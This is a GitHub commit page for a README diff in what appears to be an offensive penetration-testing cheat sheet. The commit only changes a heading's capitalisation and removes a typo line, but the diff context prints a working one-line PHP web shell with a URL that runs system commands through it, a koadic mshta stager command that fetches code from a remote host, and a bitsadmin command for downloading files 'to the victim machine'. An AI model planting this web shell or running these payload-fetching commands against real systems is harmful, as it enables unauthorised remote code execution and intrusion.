Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
ihebski authored Aug 25, 2019
1 parent 1ac6bad commit 8c654de
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -1846,11 +1846,11 @@ $ ./koadic
[>] mshta http://192.168.1.11:1245/c26qp
```
# PHP tiny webshell
# PHP Tiny Webshell
```
<?= ($_=@$_GET[0]).$_(@$_GET[1]);
```
run is whith http://127.0.0.1/shell.php?0=system&1=ls
http://127.0.0.1/shell.php?0=system&1=ls
# Donwload file to the victim machine
```
bitsadmin /transfer mydownloadjob /download /priority normal ^http://example.com/filename.zip C:\Users\username\Downloads\filename.zip
Expand Down

0 comments on commit 8c654de

Please sign in to comment.